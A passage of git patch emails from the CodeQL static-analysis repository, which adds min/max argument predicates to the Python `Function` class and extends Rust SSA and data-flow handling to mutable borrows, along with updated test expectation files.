tuple_match_mut(); } From 3956a1fea8d1c08ab7822487f5aa0cbf33867b60 Mon Sep 17 00:00:00 2001 From: Taus Date: Wed, 26 Feb 2025 13:33:16 +0000 Subject: [PATCH 036/892] Python: Move min/maxParameter methods to `Function` These seem generally useful outside of points-to, and so it might be better to add them to the `Function` class instead. I took the liberty of renaming these to say `Arguments` rather than `Parameters`, as this is more in line with the nomenclature that we're using elsewhere. (The internal points-to methods retain the old names.) I'm somewhat ambivalent about the behaviour of `getMaxParameters` on functions with `*varargs`. The hard-coded `INT_MAX` return value is somewhat awkward, but the alternative (to only have the predicate defined when a specific maximum exists) seems like it would potentially cause a lot of headaches. --- python/ql/lib/semmle/python/Function.qll | 12 ++++++++++++ .../ql/lib/semmle/python/objects/ObjectAPI.qll | 16 ++-------------- 2 files changed, 14 insertions(+), 14 deletions(-) diff --git a/python/ql/lib/semmle/python/Function.qll b/python/ql/lib/semmle/python/Function.qll index c3d5f7c801ea..1687af0038a3 100644 --- a/python/ql/lib/semmle/python/Function.qll +++ b/python/ql/lib/semmle/python/Function.qll @@ -163,6 +163,18 @@ class Function extends Function_, Scope, AstNode { ret.getValue() = result.getNode() ) } + + /** Gets the minimum number of positional arguments that can be correctly passed to this function. */ + int getMinArguments() { + result = count(this.getAnArg()) - count(this.getDefinition().getArgs().getADefault()) + } + + /** Gets the maximum number of positional arguments that can be correctly passed to this function. */ + int getMaxArguments() { + if exists(this.getVararg()) + then result = 2147483647 // INT_MAX + else result = count(this.getAnArg()) + } } /** A def statement. Note that FunctionDef extends Assign as a function definition binds the newly created function */ diff --git a/python/ql/lib/semmle/python/objects/ObjectAPI.qll b/python/ql/lib/semmle/python/objects/ObjectAPI.qll index dc1363b2ebe2..ed480cefc97d 100644 --- a/python/ql/lib/semmle/python/objects/ObjectAPI.qll +++ b/python/ql/lib/semmle/python/objects/ObjectAPI.qll @@ -738,21 +738,9 @@ class PythonFunctionValue extends FunctionValue { else result = "function " + this.getQualifiedName() } - override int minParameters() { - exists(Function f | - f = this.getScope() and - result = count(f.getAnArg()) - count(f.getDefinition().getArgs().getADefault()) - ) - } + override int minParameters() { result = this.getScope().getMinArguments() } - override int maxParameters() { - exists(Function f | - f = this.getScope() and - if exists(f.getVararg()) - then result = 2147483647 // INT_MAX - else result = count(f.getAnArg()) - ) - } + override int maxParameters() { result = this.getScope().getMaxArguments() } /** Gets a control flow node corresponding to a return statement in this function */ ControlFlowNode getAReturnedNode() { result = this.getScope().getAReturnValueFlowNode() } From 83cdcdbb0b27ae4a31ff2e2dc8626c1c7dee7ae6 Mon Sep 17 00:00:00 2001 From: Taus Date: Wed, 26 Feb 2025 13:53:49 +0000 Subject: [PATCH 037/892] Python: Add change note --- ...025-02-26-add-get-min-max-parameters-to-function-class.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 python/ql/lib/change-notes/2025-02-26-add-get-min-max-parameters-to-function-class.md diff --git a/python/ql/lib/change-notes/2025-02-26-add-get-min-max-parameters-to-function-class.md b/python/ql/lib/change-notes/2025-02-26-add-get-min-max-parameters-to-function-class.md new file mode 100644 index 000000000000..f35b0981bafc --- /dev/null +++ b/python/ql/lib/change-notes/2025-02-26-add-get-min-max-parameters-to-function-class.md @@ -0,0 +1,5 @@ +--- +category: minorAnalysis +--- + +- Added the methods `getMinArguments` and `getMaxArguments` to the `Function` class. These return the minimum and maximum positional arguments that the given function accepts. From 476fef49dab2b9df206b7f80241d13dd3943ce45 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Wed, 26 Feb 2025 14:49:59 +0100 Subject: [PATCH 038/892] Rust: Allow SSA and some data flow for mutable borrows --- .../dataflow/internal/DataFlowConsistency.qll | 8 +- .../rust/dataflow/internal/DataFlowImpl.qll | 140 ++++++++++++++-- .../codeql/rust/dataflow/internal/SsaImpl.qll | 35 ++-- .../dataflow/global/inline-flow.expected | 59 +++---- .../dataflow/global/viableCallable.expected | 32 ++-- .../dataflow/local/DataFlowStep.expected | 151 ++++++++++++++++++ .../dataflow/local/inline-flow.expected | 30 ++-- .../test/library-tests/dataflow/local/main.rs | 2 +- .../dataflow/modeled/inline-flow.expected | 36 ++--- .../dataflow/pointers/inline-flow.expected | 147 ++++++++++++++++- .../library-tests/dataflow/pointers/main.rs | 22 +-- .../library-tests/dataflow/sources/test.rs | 2 +- .../strings/inline-taint-flow.expected | 4 +- .../test/library-tests/variables/Ssa.expected | 77 +++++++-- rust/ql/test/library-tests/variables/Ssa.ql | 2 - .../security/CWE-089/SqlInjection.expected | 36 +++-- .../test/query-tests/security/CWE-089/sqlx.rs | 4 +- .../CWE-312/CleartextLogging.expected | 20 +-- .../CaptureSummaryModels.expected | 9 ++ 19 files changed, 621 insertions(+), 195 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowConsistency.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowConsistency.qll index 18d19fa7bd10..0cabde4ba1fa 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowConsistency.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowConsistency.qll @@ -11,7 +11,13 @@ private module Input implements InputSig { not exists(n.asExpr().getLocation()) } - predicate postWithInFlowExclude(RustDataFlow::Node n) { n instanceof Node::FlowSummaryNode } + predicate postWithInFlowExclude(RustDataFlow::Node n) { + n instanceof Node::FlowSummaryNode + or + // We allow flow into post-update node for receiver expressions (from the + // synthetic post receiever node). + n.(Node::PostUpdateNode).getPreUpdateNode().asExpr() = any(Node::ReceiverNode r).getReceiver() + } predicate missingLocationExclude(RustDataFlow::Node n) { not exists(n.asExpr().getLocation()) } } diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index 6d237d786beb..aacdf621ecee 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -4,6 +4,7 @@ private import codeql.util.Void private import codeql.util.Unit +private import codeql.util.Boolean private import codeql.dataflow.DataFlow private import codeql.dataflow.internal.DataFlowImpl private import rust @@ -96,6 +97,8 @@ final class ParameterPosition extends TParameterPosition { /** Gets the underlying integer position, if any. */ int getPosition() { this = TPositionalParameterPosition(result) } + predicate hasPosition() { exists(this.getPosition()) } + /** Holds if this position represents the `self` position. */ predicate isSelf() { this = TSelfParameterPosition() } @@ -367,13 +370,41 @@ module Node { private CallExprBaseCfgNode call_; private RustDataFlow::ArgumentPosition pos_; - ExprArgumentNode() { isArgumentForCall(n, call_, pos_) } + ExprArgumentNode() { + isArgumentForCall(n, call_, pos_) and + // For receivers in method calls the `ReceiverNode` is the argument. + not call_.(MethodCallExprCfgNode).getReceiver() = n + } override predicate isArgumentOf(DataFlowCall call, RustDataFlow::ArgumentPosition pos) { call.asCallBaseExprCfgNode() = call_ and pos = pos_ } } + /** + * The receiver of a method call _after_ any implicit borrow or dereferences + * has taken place. + */ + final class ReceiverNode extends ArgumentNode, TReceiverNode { + private MethodCallExprCfgNode n; + + ReceiverNode() { this = TReceiverNode(n, false) } + + ExprCfgNode getReceiver() { result = n.getReceiver() } + + MethodCallExprCfgNode getMethodCall() { result = n } + + override predicate isArgumentOf(DataFlowCall call, RustDataFlow::ArgumentPosition pos) { + call.asMethodCallExprCfgNode() = n and pos = TSelfParameterPosition() + } + + override CfgScope getCfgScope() { result = n.getAstNode().getEnclosingCfgScope() } + + override Location getLocation() { result = n.getLocation() } + + override string toString() { result = "receiver for " + this.getReceiver() } + } + final class SummaryArgumentNode extends FlowSummaryNode, ArgumentNode { private FlowSummaryImpl::Private::SummaryNode receiver; private RustDataFlow::ArgumentPosition pos_; @@ -519,6 +550,18 @@ module Node { override Location getLocation() { result = n.getLocation() } } + final class ReceiverPostUpdateNode extends PostUpdateNode, TReceiverNode { + private MethodCallExprCfgNode n; + + ReceiverPostUpdateNode() { this = TReceiverNode(n, true) } + + override Node getPreUpdateNode() { result = TReceiverNode(n, false) } + + override CfgScope getCfgScope() { result = n.getAstNode().getEnclosingCfgScope() } + + override Location getLocation() { result = n.getLocation() } + } + final class SummaryPostUpdateNode extends FlowSummaryNode, PostUpdateNode { private FlowSummaryNode pre; @@ -648,6 +691,14 @@ module LocalFlow { ) or nodeFrom.asPat().(OrPatCfgNode).getAPat() = nodeTo.asPat() + or + // Simple value step from receiver expression to receiver node, in case + // there is no implicit deref or borrow operation. + nodeFrom.asExpr() = nodeTo.(Node::ReceiverNode).getReceiver() + or + // The dual step of the above, for the post-update nodes. + nodeFrom.(Node::PostUpdateNode).getPreUpdateNode().(Node::ReceiverNode).getReceiver() = + nodeTo.(Node::PostUpdateNode).getPreUpdateNode().asExpr() } } @@ -998,6 +1049,23 @@ predicate lambdaCallExpr(CallExprCfgNode call, LambdaCallKind kind, ExprCfgNode exists(kind) } +/** Holds if `mc` implicitly borrows its receiver. */ +predicate implicitBorrow(MethodCallExpr mc) { + // Determining whether an implicit borrow happens depends on the type of the + // receiever as well as the target. As a heuristic we simply check if the + // target takes `self` as a borrow and limit the approximation to cases where + // the receiver is a simple variable. + mc.getReceiver() instanceof VariableAccess and + mc.getStaticTarget().getParamList().getSelfParam().isRef() +} + +/** Holds if `mc` implicitly dereferences its receiver. */ +predicate implicitDeref(MethodCallExpr mc) { + // Similarly to `implicitBorrow` this is an approximation. + mc.getReceiver() instanceof VariableAccess and + not mc.getStaticTarget().getParamList().getSelfParam().isRef() +} + // Defines a set of aliases needed for the `RustDataFlow` module private module Aliases { class DataFlowCallableAlias = DataFlowCallable; @@ -1054,13 +1122,12 @@ module RustDataFlow implements InputSig { DataFlowType getNodeType(Node node) { any() } predicate nodeIsHidden(Node node) { - node instanceof Node::SsaNode - or - node.(Node::FlowSummaryNode).getSummaryNode().isHidden() - or - node instanceof Node::CaptureNode - or - node instanceof Node::ClosureParameterNode + node instanceof Node::SsaNode or + node.(Node::FlowSummaryNode).getSummaryNode().isHidden() or + node instanceof Node::CaptureNode or + node instanceof Node::ClosureParameterNode or + node instanceof Node::ReceiverNode or + node instanceof Node::ReceiverPostUpdateNode } predicate neverSkipInPathGraph(Node node) { @@ -1169,6 +1236,28 @@ module RustDataFlow implements InputSig { node2.(Node::FlowSummaryNode).getSummaryNode()) } + pragma[nomagic] + private predicate implicitDerefToReceiver(Node node1, Node::ReceiverNode node2, ReferenceContent c) { + node1.asExpr() = node2.getReceiver() and + implicitDeref(node2.getMethodCall().getMethodCallExpr()) and + exists(c) + } + + pragma[nomagic] + private predicate implicitBorrowToReceiver( + Node node1, Node::ReceiverNode node2, ReferenceContent c + ) { + node1.asExpr() = node2.getReceiver() and + implicitBorrow(node2.getMethodCall().getMethodCallExpr()) and + exists(c) + } + + pragma[nomagic] + private predicate referenceExprToExpr(Node node1, Node node2, ReferenceContent c) { + node1.asExpr() = node2.asExpr().(RefExprCfgNode).getExpr() and + exists(c) + } + /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, * `node1` references an object with a content `c.getAReadContent()` whose @@ -1251,6 +1340,17 @@ module RustDataFlow implements InputSig { node2.asExpr() = await ) or + referenceExprToExpr(node2.(PostUpdateNode).getPreUpdateNode(), + node1.(PostUpdateNode).getPreUpdateNode(), c) + or + // Step from receiver expression to receiver node, in case of an implicit + // dereference. + implicitDerefToReceiver(node1, node2, c) + or + // A read step dual to the store step for implicit borrows. + implicitBorrowToReceiver(node2.(PostUpdateNode).getPreUpdateNode(), + node1.(PostUpdateNode).getPreUpdateNode(), c) + or VariableCapture::readStep(node1, c, node2) ) or @@ -1327,11 +1427,7 @@ module RustDataFlow implements InputSig { node2.(PostUpdateNode).getPreUpdateNode().asExpr() = index.getBase() ) or - exists(RefExprCfgNode ref | - c instanceof ReferenceContent and - node1.asExpr() = ref.getExpr() and - node2.asExpr() = ref - ) + referenceExprToExpr(node1, node2, c) or // Store in function argument exists(DataFlowCall call, int i | @@ -1341,6 +1437,10 @@ module RustDataFlow implements InputSig { ) or VariableCapture::storeStep(node1, c, node2) + or + // Step from receiver expression to receiver node, in case of an implicit + // borrow. + implicitBorrowToReceiver(node1, node2, c) } /** @@ -1612,9 +1712,16 @@ private module Cached { TPatNode(PatCfgNode p) or TNameNode(NameCfgNode n) { n.getName() = any(Variable v).getName() } or TExprPostUpdateNode(ExprCfgNode e) { - isArgumentForCall(e, _, _) or - lambdaCallExpr(_, _, e) or - lambdaCreationExpr(e.getExpr(), _) or + isArgumentForCall(e, _, _) + or + lambdaCallExpr(_, _, e) + or + lambdaCreationExpr(e.getExpr(), _) + or + // Whenever `&mut e` has a post-update node we also create one for `e`. + // E.g., for `e` in `f(..., &mut e, ...)` or `*(&mut e) = ...`. + e = any(RefExprCfgNode ref | ref.isMut() and exists(TExprPostUpdateNode(ref))).getExpr() + or e = [ any(IndexExprCfgNode i).getBase(), any(FieldExprCfgNode access).getExpr(), @@ -1623,6 +1730,7 @@ private module Cached { any(AwaitExprCfgNode a).getExpr() ] } or + TReceiverNode(MethodCallExprCfgNode mc, Boolean isPost) or TSsaNode(SsaImpl::DataFlowIntegration::SsaNode node) or TFlowSummaryNode(FlowSummaryImpl::Private::SummaryNode sn) or TClosureSelfReferenceNode(CfgScope c) { lambdaCreationExpr(c, _) } or diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll index 430049a5006d..36f9545f4e17 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll @@ -54,19 +54,7 @@ module SsaInput implements SsaImplCommon::InputSig { * those that are not borrowed (either explicitly using `& mut`, or * (potentially) implicit as borrowed receivers in a method call). */ - class SourceVariable extends Variable { - SourceVariable() { - this.isMutable() - implies - not exists(VariableAccess va | va = this.getAnAccess() | - va = any(RefExpr re | re.isMut()).getExpr() - or - // receivers can be borrowed implicitly, cf. - // https://doc.rust-lang.org/reference/expressions/method-call-expr.html - va = any(MethodCallExpr mce).getReceiver() - ) - } - } + class SourceVariable = Variable; predicate variableWrite(BasicBlock bb, int i, SourceVariable v, boolean certain) { ( @@ -76,7 +64,12 @@ module SsaInput implements SsaImplCommon::InputSig { ) and certain = true or - capturedCallWrite(_, bb, i, v) and certain = false + ( + capturedCallWrite(_, bb, i, v) + or + mutablyBorrows(bb.getNode(i).getAstNode(), v) + ) and + certain = false } predicate variableRead(BasicBlock bb, int i, SourceVariable v, boolean certain) { @@ -229,6 +222,14 @@ predicate capturedCallWrite(Expr call, BasicBlock bb, int i, Variable v) { ) } +/** Holds if `v` may be mutably borrowed in `e`. */ +private predicate mutablyBorrows(Expr e, Variable v) { + e = any(MethodCallExpr mc).getReceiver() and + e.(VariableAccess).getVariable() = v + or + exists(RefExpr re | re = e and re.isMut() and re.getExpr().(VariableAccess).getVariable() = v) +} + /** * Holds if a pseudo read of captured variable `v` should be inserted * at index `i` in exit block `bb`. @@ -379,6 +380,12 @@ private module DataFlowIntegrationInput implements Impl::DataFlowIntegrationInpu none() // handled in `DataFlowImpl.qll` instead } + predicate allowFlowIntoUncertainDef(UncertainWriteDefinition def) { + exists(Variable v, BasicBlock bb, int i | + def.definesAt(v, bb, i) and mutablyBorrows(bb.getNode(i).getAstNode(), v) + ) + } + class Parameter = CfgNodes::ParamBaseCfgNode; /** Holds if SSA definition `def` initializes parameter `p` at function entry. */ diff --git a/rust/ql/test/library-tests/dataflow/global/inline-flow.expected b/rust/ql/test/library-tests/dataflow/global/inline-flow.expected index aa484de0a672..c799f45a8e7d 100644 --- a/rust/ql/test/library-tests/dataflow/global/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/global/inline-flow.expected @@ -27,30 +27,30 @@ edges | main.rs:55:13:55:27 | pass_through(...) | main.rs:55:9:55:9 | b | provenance | | | main.rs:55:26:55:26 | a | main.rs:51:21:51:26 | ...: i64 | provenance | | | main.rs:55:26:55:26 | a | main.rs:55:13:55:27 | pass_through(...) | provenance | | -| main.rs:67:23:67:28 | ...: i64 | main.rs:68:14:68:14 | n | provenance | | -| main.rs:71:31:77:5 | { ... } | main.rs:90:13:90:25 | mn.get_data(...) | provenance | | -| main.rs:75:13:75:21 | source(...) | main.rs:71:31:77:5 | { ... } | provenance | | -| main.rs:79:28:79:33 | ...: i64 | main.rs:79:43:85:5 | { ... } | provenance | | +| main.rs:67:22:67:27 | ...: i64 | main.rs:68:14:68:14 | n | provenance | | +| main.rs:71:30:77:5 | { ... } | main.rs:90:13:90:25 | mn.get_data(...) | provenance | | +| main.rs:75:13:75:21 | source(...) | main.rs:71:30:77:5 | { ... } | provenance | | +| main.rs:79:27:79:32 | ...: i64 | main.rs:79:42:85:5 | { ... } | provenance | | | main.rs:90:9:90:9 | a | main.rs:91:10:91:10 | a | provenance | | | main.rs:90:13:90:25 | mn.get_data(...) | main.rs:90:9:90:9 | a | provenance | | | main.rs:96:9:96:9 | a | main.rs:97:16:97:16 | a | provenance | | | main.rs:96:13:96:21 | source(...) | main.rs:96:9:96:9 | a | provenance | | -| main.rs:97:16:97:16 | a | main.rs:67:23:67:28 | ...: i64 | provenance | | +| main.rs:97:16:97:16 | a | main.rs:67:22:67:27 | ...: i64 | provenance | | | main.rs:102:9:102:9 | a | main.rs:103:29:103:29 | a | provenance | | | main.rs:102:13:102:21 | source(...) | main.rs:102:9:102:9 | a | provenance | | | main.rs:103:9:103:9 | b | main.rs:104:10:104:10 | b | provenance | | | main.rs:103:13:103:30 | mn.data_through(...) | main.rs:103:9:103:9 | b | provenance | | -| main.rs:103:29:103:29 | a | main.rs:79:28:79:33 | ...: i64 | provenance | | +| main.rs:103:29:103:29 | a | main.rs:79:27:79:32 | ...: i64 | provenance | | | main.rs:103:29:103:29 | a | main.rs:103:13:103:30 | mn.data_through(...) | provenance | | -| main.rs:109:9:109:9 | a | main.rs:110:26:110:26 | a | provenance | | +| main.rs:109:9:109:9 | a | main.rs:110:25:110:25 | a | provenance | | | main.rs:109:13:109:21 | source(...) | main.rs:109:9:109:9 | a | provenance | | -| main.rs:110:26:110:26 | a | main.rs:67:23:67:28 | ...: i64 | provenance | | -| main.rs:115:9:115:9 | a | main.rs:116:39:116:39 | a | provenance | | +| main.rs:110:25:110:25 | a | main.rs:67:22:67:27 | ...: i64 | provenance | | +| main.rs:115:9:115:9 | a | main.rs:116:38:116:38 | a | provenance | | | main.rs:115:13:115:22 | source(...) | main.rs:115:9:115:9 | a | provenance | | | main.rs:116:9:116:9 | b | main.rs:117:10:117:10 | b | provenance | | -| main.rs:116:13:116:40 | ...::data_through(...) | main.rs:116:9:116:9 | b | provenance | | -| main.rs:116:39:116:39 | a | main.rs:79:28:79:33 | ...: i64 | provenance | | -| main.rs:116:39:116:39 | a | main.rs:116:13:116:40 | ...::data_through(...) | provenance | | +| main.rs:116:13:116:39 | ...::data_through(...) | main.rs:116:9:116:9 | b | provenance | | +| main.rs:116:38:116:38 | a | main.rs:79:27:79:32 | ...: i64 | provenance | | +| main.rs:116:38:116:38 | a | main.rs:116:13:116:39 | ...::data_through(...) | provenance | | | main.rs:128:12:128:17 | ...: i64 | main.rs:129:24:129:24 | n | provenance | | | main.rs:129:9:129:26 | MyInt {...} [MyInt] | main.rs:128:28:130:5 | { ... } [MyInt] | provenance | | | main.rs:129:24:129:24 | n | main.rs:129:9:129:26 | MyInt {...} [MyInt] | provenance | | @@ -82,13 +82,6 @@ edges | main.rs:202:13:202:21 | source(...) | main.rs:202:9:202:9 | a | provenance | | | main.rs:212:13:212:13 | c | main.rs:213:14:213:14 | c | provenance | | | main.rs:212:17:212:25 | source(...) | main.rs:212:13:212:13 | c | provenance | | -| main.rs:228:25:228:30 | ...: i64 | main.rs:229:10:229:10 | c | provenance | | -| main.rs:229:6:229:6 | [post] n [&ref] | main.rs:228:12:228:22 | ...: ... [Return] [&ref] | provenance | | -| main.rs:229:10:229:10 | c | main.rs:229:6:229:6 | [post] n [&ref] | provenance | | -| main.rs:237:13:237:13 | [post] m [&ref] | main.rs:238:11:238:11 | m [&ref] | provenance | | -| main.rs:237:16:237:25 | source(...) | main.rs:228:25:228:30 | ...: i64 | provenance | | -| main.rs:237:16:237:25 | source(...) | main.rs:237:13:237:13 | [post] m [&ref] | provenance | | -| main.rs:238:11:238:11 | m [&ref] | main.rs:238:10:238:11 | * ... | provenance | | nodes | main.rs:12:28:14:1 | { ... } | semmle.label | { ... } | | main.rs:13:5:13:13 | source(...) | semmle.label | source(...) | @@ -121,12 +114,12 @@ nodes | main.rs:55:13:55:27 | pass_through(...) | semmle.label | pass_through(...) | | main.rs:55:26:55:26 | a | semmle.label | a | | main.rs:56:10:56:10 | b | semmle.label | b | -| main.rs:67:23:67:28 | ...: i64 | semmle.label | ...: i64 | +| main.rs:67:22:67:27 | ...: i64 | semmle.label | ...: i64 | | main.rs:68:14:68:14 | n | semmle.label | n | -| main.rs:71:31:77:5 | { ... } | semmle.label | { ... } | +| main.rs:71:30:77:5 | { ... } | semmle.label | { ... } | | main.rs:75:13:75:21 | source(...) | semmle.label | source(...) | -| main.rs:79:28:79:33 | ...: i64 | semmle.label | ...: i64 | -| main.rs:79:43:85:5 | { ... } | semmle.label | { ... } | +| main.rs:79:27:79:32 | ...: i64 | semmle.label | ...: i64 | +| main.rs:79:42:85:5 | { ... } | semmle.label | { ... } | | main.rs:90:9:90:9 | a | semmle.label | a | | main.rs:90:13:90:25 | mn.get_data(...) | semmle.label | mn.get_data(...) | | main.rs:91:10:91:10 | a | semmle.label | a | @@ -141,12 +134,12 @@ nodes | main.rs:104:10:104:10 | b | semmle.label | b | | main.rs:109:9:109:9 | a | semmle.label | a | | main.rs:109:13:109:21 | source(...) | semmle.label | source(...) | -| main.rs:110:26:110:26 | a | semmle.label | a | +| main.rs:110:25:110:25 | a | semmle.label | a | | main.rs:115:9:115:9 | a | semmle.label | a | | main.rs:115:13:115:22 | source(...) | semmle.label | source(...) | | main.rs:116:9:116:9 | b | semmle.label | b | -| main.rs:116:13:116:40 | ...::data_through(...) | semmle.label | ...::data_through(...) | -| main.rs:116:39:116:39 | a | semmle.label | a | +| main.rs:116:13:116:39 | ...::data_through(...) | semmle.label | ...::data_through(...) | +| main.rs:116:38:116:38 | a | semmle.label | a | | main.rs:117:10:117:10 | b | semmle.label | b | | main.rs:128:12:128:17 | ...: i64 | semmle.label | ...: i64 | | main.rs:128:28:130:5 | { ... } [MyInt] | semmle.label | { ... } [MyInt] | @@ -184,24 +177,15 @@ nodes | main.rs:212:13:212:13 | c | semmle.label | c | | main.rs:212:17:212:25 | source(...) | semmle.label | source(...) | | main.rs:213:14:213:14 | c | semmle.label | c | -| main.rs:228:12:228:22 | ...: ... [Return] [&ref] | semmle.label | ...: ... [Return] [&ref] | -| main.rs:228:25:228:30 | ...: i64 | semmle.label | ...: i64 | -| main.rs:229:6:229:6 | [post] n [&ref] | semmle.label | [post] n [&ref] | -| main.rs:229:10:229:10 | c | semmle.label | c | -| main.rs:237:13:237:13 | [post] m [&ref] | semmle.label | [post] m [&ref] | -| main.rs:237:16:237:25 | source(...) | semmle.label | source(...) | -| main.rs:238:10:238:11 | * ... | semmle.label | * ... | -| main.rs:238:11:238:11 | m [&ref] | semmle.label | m [&ref] | subpaths | main.rs:36:26:36:26 | a | main.rs:30:17:30:22 | ...: i64 | main.rs:30:32:32:1 | { ... } | main.rs:36:13:36:27 | pass_through(...) | | main.rs:41:26:44:5 | { ... } | main.rs:30:17:30:22 | ...: i64 | main.rs:30:32:32:1 | { ... } | main.rs:41:13:44:6 | pass_through(...) | | main.rs:55:26:55:26 | a | main.rs:51:21:51:26 | ...: i64 | main.rs:51:36:53:5 | { ... } | main.rs:55:13:55:27 | pass_through(...) | -| main.rs:103:29:103:29 | a | main.rs:79:28:79:33 | ...: i64 | main.rs:79:43:85:5 | { ... } | main.rs:103:13:103:30 | mn.data_through(...) | -| main.rs:116:39:116:39 | a | main.rs:79:28:79:33 | ...: i64 | main.rs:79:43:85:5 | { ... } | main.rs:116:13:116:40 | ...::data_through(...) | +| main.rs:103:29:103:29 | a | main.rs:79:27:79:32 | ...: i64 | main.rs:79:42:85:5 | { ... } | main.rs:103:13:103:30 | mn.data_through(...) | +| main.rs:116:38:116:38 | a | main.rs:79:27:79:32 | ...: i64 | main.rs:79:42:85:5 | { ... } | main.rs:116:13:116:39 | ...::data_through(...) | | main.rs:134:24:134:33 | source(...) | main.rs:128:12:128:17 | ...: i64 | main.rs:128:28:130:5 | { ... } [MyInt] | main.rs:134:13:134:34 | ...::new(...) [MyInt] | | main.rs:187:49:187:49 | a [MyInt] | main.rs:175:18:175:21 | SelfParam [MyInt] | main.rs:175:48:177:5 | { ... } [MyInt] | main.rs:187:30:187:53 | ...::take_self(...) [MyInt] | | main.rs:192:54:192:54 | b [MyInt] | main.rs:179:26:179:37 | ...: MyInt [MyInt] | main.rs:179:49:181:5 | { ... } [MyInt] | main.rs:192:30:192:55 | ...::take_second(...) [MyInt] | -| main.rs:237:16:237:25 | source(...) | main.rs:228:25:228:30 | ...: i64 | main.rs:228:12:228:22 | ...: ... [Return] [&ref] | main.rs:237:13:237:13 | [post] m [&ref] | testFailures #select | main.rs:18:10:18:10 | a | main.rs:13:5:13:13 | source(...) | main.rs:18:10:18:10 | a | $@ | main.rs:13:5:13:13 | source(...) | source(...) | @@ -219,4 +203,3 @@ testFailures | main.rs:193:10:193:10 | c | main.rs:191:28:191:37 | source(...) | main.rs:193:10:193:10 | c | $@ | main.rs:191:28:191:37 | source(...) | source(...) | | main.rs:203:10:203:10 | a | main.rs:202:13:202:21 | source(...) | main.rs:203:10:203:10 | a | $@ | main.rs:202:13:202:21 | source(...) | source(...) | | main.rs:213:14:213:14 | c | main.rs:212:17:212:25 | source(...) | main.rs:213:14:213:14 | c | $@ | main.rs:212:17:212:25 | source(...) | source(...) | -| main.rs:238:10:238:11 | * ... | main.rs:237:16:237:25 | source(...) | main.rs:238:10:238:11 | * ... | $@ | main.rs:237:16:237:25 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/global/viableCallable.expected b/rust/ql/test/library-tests/dataflow/global/viableCallable.expected index ad83682d7d06..776300d8943e 100644 --- a/rust/ql/test/library-tests/dataflow/global/viableCallable.expected +++ b/rust/ql/test/library-tests/dataflow/global/viableCallable.expected @@ -23,9 +23,9 @@ | main.rs:103:13:103:30 | mn.data_through(...) | main.rs:79:5:85:5 | fn data_through | | main.rs:104:5:104:11 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:109:13:109:21 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:110:5:110:27 | ...::data_in(...) | main.rs:67:5:69:5 | fn data_in | +| main.rs:110:5:110:26 | ...::data_in(...) | main.rs:67:5:69:5 | fn data_in | | main.rs:115:13:115:22 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:116:13:116:40 | ...::data_through(...) | main.rs:79:5:85:5 | fn data_through | +| main.rs:116:13:116:39 | ...::data_through(...) | main.rs:79:5:85:5 | fn data_through | | main.rs:117:5:117:11 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:134:13:134:34 | ...::new(...) | main.rs:127:5:130:5 | fn new | | main.rs:134:24:134:33 | source(...) | main.rs:1:1:3:1 | fn source | @@ -56,22 +56,12 @@ | main.rs:220:41:220:54 | async_source(...) | main.rs:201:1:205:1 | fn async_source | | main.rs:221:5:221:11 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:223:33:223:61 | test_async_await_async_part(...) | main.rs:207:1:217:1 | fn test_async_await_async_part | -| main.rs:236:5:236:12 | sink(...) | main.rs:5:1:7:1 | fn sink | -| main.rs:237:5:237:26 | set_int(...) | main.rs:228:1:230:1 | fn set_int | -| main.rs:237:16:237:25 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:238:5:238:12 | sink(...) | main.rs:5:1:7:1 | fn sink | -| main.rs:244:5:244:11 | sink(...) | main.rs:5:1:7:1 | fn sink | -| main.rs:245:5:245:31 | set_int(...) | main.rs:228:1:230:1 | fn set_int | -| main.rs:245:21:245:30 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:246:5:246:11 | sink(...) | main.rs:5:1:7:1 | fn sink | -| main.rs:250:5:250:22 | data_out_of_call(...) | main.rs:16:1:19:1 | fn data_out_of_call | -| main.rs:251:5:251:21 | data_in_to_call(...) | main.rs:25:1:28:1 | fn data_in_to_call | -| main.rs:252:5:252:23 | data_through_call(...) | main.rs:34:1:38:1 | fn data_through_call | -| main.rs:253:5:253:34 | data_through_nested_function(...) | main.rs:48:1:57:1 | fn data_through_nested_function | -| main.rs:255:5:255:24 | data_out_of_method(...) | main.rs:88:1:92:1 | fn data_out_of_method | -| main.rs:256:5:256:28 | data_in_to_method_call(...) | main.rs:94:1:98:1 | fn data_in_to_method_call | -| main.rs:257:5:257:25 | data_through_method(...) | main.rs:100:1:105:1 | fn data_through_method | -| main.rs:259:5:259:31 | test_operator_overloading(...) | main.rs:148:1:164:1 | fn test_operator_overloading | -| main.rs:260:5:260:22 | test_async_await(...) | main.rs:219:1:224:1 | fn test_async_await | -| main.rs:261:5:261:24 | mutates_argument_1(...) | main.rs:232:1:239:1 | fn mutates_argument_1 | -| main.rs:262:5:262:24 | mutates_argument_2(...) | main.rs:241:1:247:1 | fn mutates_argument_2 | +| main.rs:227:5:227:22 | data_out_of_call(...) | main.rs:16:1:19:1 | fn data_out_of_call | +| main.rs:228:5:228:21 | data_in_to_call(...) | main.rs:25:1:28:1 | fn data_in_to_call | +| main.rs:229:5:229:23 | data_through_call(...) | main.rs:34:1:38:1 | fn 